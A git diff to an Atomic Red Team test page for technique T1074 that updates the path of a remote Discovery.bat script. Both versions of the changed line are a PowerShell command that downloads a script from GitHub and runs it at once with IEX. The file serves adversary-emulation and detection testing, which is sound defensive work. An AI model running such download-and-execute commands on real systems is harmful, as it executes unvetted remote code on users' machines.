diff --git a/atomics/T1074/T1074.md b/atomics/T1074/T1074.md index a6e45ac2..f6f81835 100644 --- a/atomics/T1074/T1074.md +++ b/atomics/T1074/T1074.md @@ -27,6 +27,6 @@ Utilize powershell to download discovery.bat and save to a local file #### Run it with `powershell`! ``` -powershell.exe "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/Windows/Payloads/Discovery.bat')" > c:\windows\pi.log +powershell.exe "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1074/Discovery.bat')" > c:\windows\pi.log ```